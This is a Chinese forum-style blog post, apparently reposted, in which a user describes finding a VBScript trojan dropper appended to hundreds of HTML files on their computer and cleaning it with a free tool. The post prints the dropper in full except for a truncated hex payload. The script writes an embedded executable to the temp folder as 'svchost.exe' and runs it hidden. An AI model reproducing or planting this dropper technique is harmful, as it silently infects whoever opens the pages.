欢迎各位兄弟 发布技术文章

这里的技术是共享的

You are here

批量查杀该死的VBscript “svchost.exe” 脚本挂马

今天写代码突然发现HTML文件最后多了一段VBscript代码;

  1. <SCRIPT Language=VBScript><!--

  2. DropFileName = "svchost.exe"

  3. WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000504500004C010300BC7CB1470000000000000000E0000F010B01070400E000000010000000E0010030C0020000F0010000D002000000400000100000000200000A00000008000100040000000000000000E002000010000000000000020000000000100000100000000010000010000000000000100000000000000000000000E8D402001001000000D00200E80400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000E00100001000000000000000040000000000000000000000000000800000E0555058310000000000E0000000F0010000D2000000040000000000000000000000000000400000E02E727372630000000010000000D002000006000000D60000000000000000000000000000400000C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000332E303300555058210D09020838ADBE177792F93FD0A0020023D000000048010026000012B29FA89200FF25304041CD6EE59202E4420564401919197970005C8C01191919C8EC94BF1D90B14435F4244105558BEC81C4..........<span style="color: #FF0000;"><strong>此处数万代码</strong></span>"

  4. Set FSO = CreateObject("Scripting.FileSystemObject")

  5. DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName

  6. If FSO.FileExists(DropPath)=False Then

  7. Set FileObj = FSO.CreateTextFile(DropPath, True)

  8. For i = 1 To Len(WriteData) Step 2

  9. FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))

  10. Next

  11. FileObj.Close

  12. End If

  13. Set WSHshell = CreateObject("WScript.Shell")

  14. WSHshell.Run DropPath, 0

  15. //--></SCRIPT>

看这段代码应该是挂在网页上的木马,然后我赶紧把电脑里其他html文件看了一下,果然,但凡html文件都被感染了。

四百多个html文件,****挂马他祖宗。

开始尝试手工删除挂马脚本,删了大概有80多个文件,内心十分崩溃。

还剩405个文件,于是开始锲而不舍的问百度,必应,谷歌。终于。。。找到了一个清这玩意的神器。

良心工具啊,免费不说,清理速度真快,就是需要手工清理,多清几次就干净了。直接百度搜 护卫神挂马清理工具 就可以找到,好用免费速度快。


来自  https://www.bbsmax.com/A/1O5EO10rz7/

普通分类: